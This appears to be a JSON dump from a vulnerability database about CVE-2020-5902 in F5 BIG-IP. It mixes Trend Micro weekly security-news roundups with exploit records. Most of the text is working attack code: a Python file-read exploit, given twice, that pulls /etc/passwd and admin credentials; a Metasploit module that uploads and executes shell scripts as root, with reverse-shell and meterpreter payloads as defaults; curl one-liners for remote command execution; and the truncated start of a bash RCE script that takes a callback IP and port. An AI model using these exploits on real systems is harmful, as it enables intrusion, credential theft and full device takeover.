It: Firm Won&#x27;t Patch Vulnerable Gear Despite Live Proof-of-Concept Code**](<https://www.theregister.com/2020/07/30/netgear_abandons_45_routers_vuln_patching/>)\n\n_Netgear has decided not to patch more than 40 home routers to plug a remote code execution vulnerability \u2013 despite security researchers having published proof-of-concept exploit code. The vulnerability was revealed publicly in June by Trend Micro&#x27;s Zero Day Initiative (ZDI)._\n\n[**Online Dating Websites Lure Japanese Customers to Scams**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/online-dating-websites-lure-japanese-customers-to-scams>)\n\n_In May, Trend Micro observed a sudden increase in traffic for online dating websites primarily targeting Japanese customers. After analyzing and tracking these numbers, we found that these dating scam campaigns attract potential victims by using different website domains that have similar screen page layouts. By the end of the transactions, the fraudsters steal money from victims without the subscribers receiving any of the advertised results._\n\n[**ESG Findings on Trend Micro Cloud-Powered XDR Drives Monumental Business Value**](<https://blog.trendmicro.com/esg-findings-xdr/>)\n\n_Trend Micro\u2019s cloud-powered XDR and Managed XDR offerings optimize threat detection and response across all critical vectors. In a recent survey commissioned by Trend Micro and conducted by ESG, organizations surveyed experience faster detection and less alert fatigue as a result of intelligently using data from all their security controls (including those covering endpoints, email, servers, cloud workloads and networks)._\n\nHow does your organization manage threat detection and response? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years](<https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-07-31T12:30:21", "published": "2020-07-31T12:30:21", "id": "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "href": "https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/", "type": "trendmicroblog", "title": "This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-10T15:54:49", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. Also, learn about a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173.\n\nRead on:\n\n[**Cloud Security is Simple, Absolutely Simple.**](<https://blog.trendmicro.com/cloud-security-is-simple/>)\n\n_\u201cCloud security is simple, absolutely simple. Stop over complicating it.\u201d This is the advice that Mark Nunnikhoven, vice president of cloud research at Trend Micro, shared to kick off his presentation at the CyberRisk Alliance Cloud Security Summit this year. Check out a recording of his talk in this blog recap to learn more._\n\n[**Order Out of Chaos: Tackling Phishing Attacks**](<https://securityboulevard.com/2020/07/order-out-of-chaos-tackling-phishing-attacks/>)\n\n_Responding to phishing attacks requires a combination of commodity tools, cutting-edge machine learning techniques and human-powered defense. That\u2019s how to create order out of chaos and beat the phishers at their own game, according to Trend Micro\u2019s Greg Young. Learn more in his recent article on phishing in Security Boulevard. _\n\n[**Beyond the Endpoint: Why Organizations are Choosing XDR for Holistic Detection and Response**](<https://blog.trendmicro.com/beyond-the-endpoint-why-organizations-are-choosing-xdr-for-holistic-detection-and-response/>)\n\n_The endpoint has long been a major focal point for attackers targeting enterprise IT environments. Yet increasingly, security teams are needing to protect data across the organization - whether it\u2019s in the cloud, on IoT devices, in email, or on-premises servers - attackers may jump from one environment to the next in multi-stage attacks and even hide between the layers. XDR solutions offer a convincing alternative to EDR and point solutions._\n\n[**15 Billion Credentials Currently Up for Grabs on Hacker Forums**](<https://threatpost.com/15-billion-credentials-currently-up-for-grabs-on-hacker-forums/157247/>)\n\n_Fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. A report released from the Digital Shadows Photon Research Team found that 100,000 separate data breaches over a 2-year period have yielded a 300% increase in stolen credentials, leaving a wealth of account details on dark-web hacker forums up for grabs._\n\n[**ISO/SAE 21434: It\u2019s Time to Put the Brakes on Connected Car Cyber-Threats**](<https://blog.trendmicro.com/iso-sae-21434-its-time-to-put-the-brakes-on-connected-car-cyber-threats/>)\n\n_Connected cars are set to grow 270% by 2022 to reach an estimated 125 million in just a few years. However, the high-performance mobile computers in connected cars can also leave them exposed to sensitive data theft and remote manipulation, which could create serious physical safety issues. This is where the ISO/SAE 21434 standard comes in and creates detailed guidance for the automotive industry to help it navigate these challenges and reduce reputational and cyber-risk._\n\n[**New Mirai Variant Expands Arsenal, Exploits CVE-2020-10173**](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/>)\n\n_Trend Micro discovered a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which were not observed as exploited by past Mirai variants. This discovery is a new addition to the Mirai variants that appeared in the past few months which include SORA, UNSTABLE, and Mukashi. _\n\n[**Microsoft Files Lawsuit to Seize Fake Domains Used in COVID-19-Themed BEC Attacks**](<https://www.securityweek.com/microsoft-files-lawsuit-seize-fake-domains-used-covid-19-themed-bec-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29>)\n\n_Microsoft has filed a lawsuit in an effort to seize control of several domains used to launch COVID-19-themed cyberattacks against the company\u2019s customers in 62 countries. The company started tracking the malicious activity in December 2019 after identifying it as a phishing scheme attempting to compromise Microsoft customer accounts and access emails, contacts, sensitive files, and other information._\n\n[**Cleaner One Pro Speeds Up Your Mac: Part 1**](<https://blog.trendmicro.com/cleaner-one-pro-speeds-up-your-mac-part-1/>)\n\n_Trend Micro Cleaner One Pro is an easy-to-use, all-in-one disk cleaning and optimization utility that can help you boost your Mac\u2019s performance. In this two-part blog series, Trend Micro outlines how you can use Cleaner One Pro to make your Mac run faster, walking you through its features. In Part 1, Trend Micro focuses on Quick Optimizer, the Main Console, and the Cleaning Tools. _\n\n[**Joker Malware Apps Once Again Bypass Google's Security to Spread via Play Store**](<https://thehackernews.com/2020/07/joker-android-mobile-virus.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29>)\n\n_Cybersecurity researchers unveiled another instance of Android malware hidden under the guise of legitimate applications to stealthily subscribe unsuspecting users for premium services without their knowledge. The Joker malware has found another trick to bypass Google's Play Store protections: obfuscate the malicious DEX executable inside the application as Base64 encoded strings, which are then decoded and loaded on the compromised device._\n\n[**Malicious Chrome Extensions, Domains Used to Steal User Data**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/chrome-extensions-malicious-domains-used-to-steal-user-data>)\n\n_Google Chrome extensions and Communigal Communication Ltd. (Galcomm) domains were used in a campaign that aims to track user activity and data, according to Awake Security. In the past three months, the researchers found 111 malicious or fake Chrome extensions using Galcomm domains as their command and control infrastructure. There have been at least 32 million downloads of these malicious extensions._\n\n[**Patch Now: F5 Vulnerability with CVSS 10 Severity Score**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/patch-now-f5-vulnerability-with-cvss-10-severity-score>)\n\n_F5 Networks, a provider of networking devices and services, urges users to patch their BIG-IP networking systems as soon as possible after disclosing two vulnerabilities: CVE-2020-5902, a critical remote code execution (RCE) vulnerability found in BIG-IP device\u2019s Traffic Management User Interface (TMUI), and_ _CVE-2020-5903, a less critical vulnerability that involves cross-site scripting (XSS). F5 has now released patches for both in the vulnerabilities\u2019 respective security advisories._\n\n[**Ransomware Report: Avaddon and New Techniques Emerge, Industrial Sector Targeted**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted>)\n\n_Over the past couple of months, ransomware has remained a formidable threat as new families, techniques, and targets continue emerging at every turn. Trend Micro recently witnessed the rise of a new ransomware family called Avaddon. In this blog, Trend Micro examines techniques utilized by some ransomware variants and the industries affected by these attacks. _\n\n[**70% of Organizations Experienced a Public Cloud Security Incident in the Last Year**](<https://www.helpnetsecurity.com/2020/07/09/public-cloud-security-incident/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29>)\n\n_70% of organizations experienced a public cloud security incident in the last year \u2013 including ransomware and other malware (50%), exposed data (29%), compromised accounts (25%), and cryptojacking (17%), according to Sophos._ _Organizations running multi-cloud environments are greater than 50% more likely to suffer a cloud security incident than those running a single cloud._\n\n[**Russian Group Cosmic Lynx Launches Over 200 BEC Campaigns**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/russian-group-cosmic-lynx-launches-over-200-bec-campaigns>)\n\n_A Russian group dubbed as Cosmic Lynx initiated more than 200 Business Email Compromise (BEC) campaigns targeting hundreds of multinational companies, according to security firm Agari. Cosmic Lynx was revealed to have been launching campaigns in over 40 countries including the United States, Canada, and Australia since 2019. The average amount requested from the targets is at US $1.27 million._\n\n[**Guidelines Related to Security in Smart Factories Part 3: NIST Cyber Security Framework**](<https://www.trendmicro.com/us/iot-security/news/5979/Guidelines_Related_to_Security_in_Smart_Factories_Part_3_NIST_Cyber_Security_Framework>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Part three dives into the NIST Cyber Security Framework (CSF), which is issued by US National Institute of Standards and Technology (NIST). _\n\nHas your organization experienced a public cloud security incident over the last year? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal](<https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-07-10T12:30:22", "published": "2020-07-10T12:30:22", "id": "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "href": "https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/", "type": "trendmicroblog", "title": "This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-07-07T09:54:15", "bulletinFamily": "blog", "description": "By Jon Munshaw. Cisco Talos just released Snort coverage for a prominent vulnerability in F5\u2019s BIG-IP. BIG-IP is one of the most popular networking products on the modern market. This product is used to shape web traffic, access gateways, limit rates and much more. F5 disclosed a remote code execution over the weekend that was assigned a maximum 10 out of 10 severity score. CVE-2020-5902 is a remote code execution vulnerability in BIG-IP's configuration interface. Users are urged to make... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "modified": "2020-07-06T14:19:53", "published": "2020-07-06T14:19:53", "id": "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/WdHAUZcKoHk/snort-rule-f5-rce-critical-vuln.html", "type": "talosblog", "title": "New Snort rule addresses critical vulnerability in F5 BIG-IP", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2020-07-18T15:48:23", "bulletinFamily": "exploit", "description": "File disclosure vulnerability in F5 BIG-IP Traffic Management User Interface\n\nVulnerability Type: File Disclosure", "modified": "2020-07-05T00:00:00", "published": "2020-07-05T00:00:00", "id": "E-709", "href": "", "type": "dsquare", "title": "F5 BIG-IP Traffic Management User Interface File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-07-28T17:51:18", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-27T00:00:00", "published": "2020-07-27T00:00:00", "id": "PACKETSTORM:158581", "href": "https://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html", "title": "F5 Big-IP 13.1.3 Build 0.0.6 Local File Inclusion", "type": "packetstorm", "sourceData": "`# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion \n# Date: 2019-08-17 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: <= 13.1.3 \n# Tested on: BIG-IP 13.1.3 Build 0.0.6 \n# CVE : CVE-2020-5902 \n \n#!/usr/bin/env python \n \nimport requests \nimport sys \nimport time \nimport urllib3 \nimport json \nurllib3.disable_warnings() \n \nglobal target \n \ndef checkTarget(): \n \nr = requests.head(target + \"/tmui/login.jsp\", verify=False) \nif(r.status_code == 200): \nreturn True \nelse: \nreturn False \n \ndef checkVuln(): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0): \nreturn True \nelse: \nreturn False \n \nelse: \nreturn False \n \ndef leakPasswd(): \nprint(\"[+] Leaking /etc/passwd from server\") \ntime.sleep(2) \nexploit('/etc/passwd') \n \n \ndef leakHosts(): \nprint(\"[+] Leaking /etc/hosts from server\") \ntime.sleep(2) \nexploit('/etc/hosts') \n \ndef leakLicence(): \n \nprint(\"[+] Leaking /config/bigip.license from server\") \ntime.sleep(2) \nexploit('/config/bigip.license') \n \ndef leakAdmin(): \n \nprint(\"[+] Leaking admin credentials from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0 ): \nprint(data['output']) \nelse: \nprint(\"[X] Admin credentials not found\") \nelse: \nprint(\"[X] Fail to read file\") \n \n \ndef exploit(file): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nprint(data['output']) \nelse: \nprint(\"[X] Fail to read file\") \n \ndef memoryLeak(): \nprint(\"[!] Leaking tomcat process from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nif(len(data['output'])>0): \nprint(\"Command: \" + data['output']) \n \ndef main(host): \n \nprint(\"[+] Check target...\") \nglobal target \ntarget = \"https://\" + host \n \ncheck = checkTarget() \nif(check): \nprint(\"[~] Target is available\") \n \nvuln = checkVuln() \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \n \ntime.sleep(1) \nprint(\"[~] Leak information from target!\") \ntime.sleep(1) \nleakPasswd() \nleakHosts() \nleakLicence() \nleakAdmin() \nmemoryLeak() \nelse: \nprint(\"[X] Target is't vulnerable\") \n \nelse: \nprint(\"[x] Target is unavailable\") \n \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 2): \nprint(\"Use: python {} ip/dns\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nmain(host) \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158581/f5bigip1313006-lfi.txt"}, {"lastseen": "2020-07-08T08:52:38", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "PACKETSTORM:158366", "href": "https://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in F5's BIG-IP Traffic \nManagement User Interface (TMUI) to upload a shell script and execute \nit as the root user. \n \nVersions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, \n15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced \nin 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. \n \nTested on the VMware OVA release of 14.1.2. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2020-5902'], \n['URL', 'https://support.f5.com/csp/article/K52145254'], \n['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/'] \n], \n'DisclosureDate' => '2020-06-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' \n} \n], \n[ \n'Linux Dropper', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 5 \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service \n'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptString.new('WritableDir', [true, 'Writable directory', '/tmp']) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'), \n'vars_post' => { \n'fileName' => '/etc/f5-release' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body \nreturn CheckCode::Safe('Target did not respond with BIG-IP version.') \nend \n \n# If we got here, the directory traversal was successful \nCheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\") \nend \n \ndef exploit \ncreate_alias \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \ndelete_alias if @created_alias \nend \n \ndef create_alias \nprint_status('Creating alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'create cli alias private list command bash' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nfail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash') \nend \n \n@created_alias = true \n \nprint_good('Successfully created alias list=bash') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nupload_script(cmd) \nexecute_script \nend \n \ndef upload_script(cmd) \nprint_status(\"Uploading #{script_path}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'), \n'vars_post' => { \n'fileName' => script_path, \n'content' => cmd \n} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\") \nend \n \nregister_file_for_cleanup(script_path) \n \nprint_good(\"Successfully uploaded #{script_path}\") \nend \n \ndef execute_script \nprint_status(\"Executing #{script_path}\") \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => \"list #{script_path}\" \n} \n}, 3.5) \nend \n \ndef delete_alias \nprint_status('Deleting alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'delete cli alias private list' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nprint_warning('Failed to delete alias list=bash') \nreturn \nend \n \nprint_good('Successfully deleted alias list=bash') \nend \n \ndef dir_trav(path) \n# PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\"> \nnormalize_uri(target_uri.path, '/tmui/login.jsp/..;', path) \nend \n \ndef script_path \n@script_path ||= \nnormalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42)) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158366/f5_bigip_tmui_rce.rb.txt"}, {"lastseen": "2020-07-08T08:52:38", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "PACKETSTORM:158333", "href": "https://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html", "title": "BIG-IP TMUI Remote Code Execution", "type": "packetstorm", "sourceData": "`## RCE: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' \n \n## Read File: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158333/bigiptmui-exec.txt"}], "exploitdb": [{"lastseen": "2020-07-26T20:28:06", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-26T00:00:00", "published": "2020-07-26T00:00:00", "id": "EDB-ID:48711", "href": "https://www.exploit-db.com/exploits/48711", "type": "exploitdb", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion\r\n# Date: 2019-08-17\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48711"}, {"lastseen": "2020-07-07T18:25:21", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-05T00:00:00", "published": "2020-07-05T00:00:00", "id": "EDB-ID:48643", "href": "https://www.exploit-db.com/exploits/48643", "type": "exploitdb", "title": "BIG-IP 15.0.0 &lt; 15.1.0.3 / 14.1.0 &lt; 14.1.2.5 / 13.1.0 &lt; 13.1.3.3 / 12.1.0 &lt; 12.1.5.1 / 11.6.1 &lt; 11.6.5.1 - Traffic Management User Interface &#039;TMUI&#039; Remote Code Execution (PoC)", "sourceData": "## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48643"}, {"lastseen": "2020-07-07T10:26:00", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-06T00:00:00", "published": "2020-07-06T00:00:00", "id": "EDB-ID:48642", "href": "https://www.exploit-db.com/exploits/48642", "type": "exploitdb", "title": "BIG-IP 15.0.0 &lt; 15.1.0.3 / 14.1.0 &lt; 14.1.2.5 / 13.1.0 &lt; 13.1.3.3 / 12.1.0 &lt; 12.1.5.1 / 11.6.1 &lt; 11.6.5.1 - Traffic Management User Interface &#039;TMUI&#039; Remote Code Execution", "sourceData": "#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null 